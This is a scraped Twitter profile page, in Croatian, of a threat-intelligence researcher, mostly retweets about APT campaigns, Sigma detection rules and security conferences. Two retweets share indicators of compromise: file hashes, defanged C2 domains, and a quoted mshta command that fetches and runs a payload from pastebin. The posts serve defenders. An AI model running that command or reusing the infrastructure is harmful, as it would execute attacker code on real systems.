Casey Brooks

@DrunkBinary

Senior Adversary Hunter , Army Veteran, Cocktail Scientist, APT Researcher | Opinions are my own and not the views of my employer.

Neverwhere
Vrijeme pridruživanja: listopad 2015.
686 fotografija ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @DrunkBinary

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @DrunkBinary

  1. Prikvačeni tweet
    16. stu 2018.

    Awesome

    11 proslijeđenih tweetova 69 korisnika označava da im se sviđa
    Poništi
  2. proslijedio/la je Tweet
    prije 3 sata

    Senior Adversary Hunter from talking to customers about the current threat landscape affecting OnG environments with no fluff or BS

    1 reply 2 proslijeđena tweeta 10 korisnika označava da im se sviđa
    Poništi
  3. proslijedio/la je Tweet
    prije 7 sati

    2020-02-05: [Breaking]🔥🆕 "🇷🇺Pro-Russian CyberSpy Intensifies Ukrainian 🇺🇦 Security Targeting" 🔦The 'Fifth Domain': Gamaredon Wages Silent War with Ukranian Military & Law Enforcement ➡️5k Victim Scope in Ukraine Along 'Separation Line'

    27 proslijeđenih tweetova 40 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    prije 14 sati

    Coming soon to Sysmon: clipboard logging for malicious RDP session DFIR, and shredded file recovery for capturing hacking tools

    14 replies 203 proslijeđena tweeta 616 korisnika označava da im se sviđa
    Poništi
  5. proslijedio/la je Tweet
    prije 20 sati

    Sigma rule to detect Dumpert password dumper - used by Emissary Panda in recent campaigns Dumpert Rule Report by

    45 proslijeđenih tweetova 117 korisnika označava da im se sviđa
    Poništi
  6. prije 17 sati

    Got my EICAR QR Code Velcro patch from

    3 proslijeđena tweeta 29 korisnika označava da im se sviđa
    Poništi
  7. proslijedio/la je Tweet
    3. velj

    w00t the paper I wrote to accompany my presentation is now available! Find it here (and note the "Skip" button below the contact form to get right to the paper):

    17 proslijeđenih tweetova 48 korisnika označava da im se sviđa
    Poništi
  8. proslijedio/la je Tweet
    3. velj

    To the person who figured out my honeypot is a honeypot could you please stop putting the picture of Pooh bear with a jar of honey on it? Its like this person's life mission, I've blocked him on: - Client - IPs (now on Tor ffs) - The image (he just edits 1 pixel every time...)

    138 replies 852 proslijeđena tweeta 4.631 korisnik označava da mu se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  9. 3. velj

    ikr, gotta dig out book for this

    has me Googling things like
    1 proslijeđeni tweet 1 korisnik označava da mu se sviđa
    Poništi
  10. 2. velj

    Interested in learning more about Telecommunication Security? Check out

    📰 #️⃣5⃣ .:Telecommunications Security Watch - 5:. ↘️
    Prikaži ovu nit
    5 korisnika označava da im se sviđa
    Poništi
  11. proslijedio/la je Tweet
    1. velj

    My team is reading this book, and some are highlighting portions that I would debate. For example, page 81 discusses "offensive methods" that "become public and disappear." That may be the view of a top tier foreign intelligence organization, but is largely not true for others.

    This book is under 200 pages of easy to consume material, but in my opinion it is one of the most important books for any information security professional to read. I've recommended it for years now, but plenty of you have not read it. Pick it up today.
    Prikaži ovu nit
    8 replies 14 proslijeđenih tweetova 118 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    27. sij

    doc - a4b6abdbcdceab1ad5cf6784600aca34 dot - dd1033f4fa3fc8ba0fde4eb457a4fe6f C2: kastoget.hopto[.]org papir.hopto[.]org

    1 reply 17 proslijeđenih tweetova 38 korisnika označava da im se sviđa
    Poništi
  13. 1. velj

    No, bad tweet, bad tweet, get back in your hole...

    Tweet je nedostupan.
    9 replies 7 proslijeđenih tweetova 32 korisnika označavaju da im se sviđa
    Poništi
  14. proslijedio/la je Tweet
    30. sij

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

    57 proslijeđenih tweetova 155 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    30. sij

    I've spent a whole day on Sigma Focus: Facilitate contributions - New Rule Creation Guide - New colorised test output - New test cases - Rule cleanup (title, date, ids) Next step: How-to guide for pull requests

    78 proslijeđenih tweetova 234 korisnika označavaju da im se sviđa
    Poništi
  16. proslijedio/la je Tweet
    31. sij

    This is how communicates with the team.

    3 proslijeđena tweeta 14 korisnika označava da im se sviđa
    Poništi
  17. proslijedio/la je Tweet
    31. sij

    Epic Angry Rant! Ripping Blizzard Activision for their awful Warcraft 3 Reforged Debacle & Terrible Response! The passion is gone! Disgraceful. You Done F&@KED IT UP! RT Plz! 1st Gaming Epic Fail of 2020!

    68 replies 146 proslijeđenih tweetova 792 korisnika označavaju da im se sviđa
    Poništi
  18. proslijedio/la je Tweet
    30. sij

    As I’m still in recovery from my battle with cancer I will not be attending this year. Working to be good for joining Blackhat/DEFCON! However my awesome colleagues are at . Come talk with them about our data and platforms 🙃. You can find them at booth #4429.

    1 reply 4 proslijeđena tweeta 34 korisnika označavaju da im se sviđa
    Poništi
  19. proslijedio/la je Tweet
    30. sij

    At the SANS , will highlight 3 case studies that prove understanding the process environment & identifying critical path nodes for the defended facility is vital to ensure appropriate defense where it matters most | Mar 2-3 | Agenda:

    1 proslijeđeni tweet 9 korisnika označava da im se sviđa
    Poništi
  20. proslijedio/la je Tweet
    29. sij

    So this just happened: First (real) blog at the new job.

    15 proslijeđenih tweetova 56 korisnika označava da im se sviđa
    Poništi
  21. proslijedio/la je Tweet
    29. sij

    🇮🇷 has also used tracking pixels. It isn't a novel technique of course, but it is observed in the wild in targeted threat activity. Even beyond email, communication clients are notorious for leaking information. It's not a bad idea to rigorously test how they behave.

    Moral of the story is - opening an email in certain mail clients can leak information about your system b/c your mail client autoloads a tracking pixel. And although it might be a company hosting a hot party - it could also be someone less "friendly"
    Prikaži ovu nit
    45 proslijeđenih tweetova 113 korisnika označava da im se sviđa
    Poništi

@DrunkBinary još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·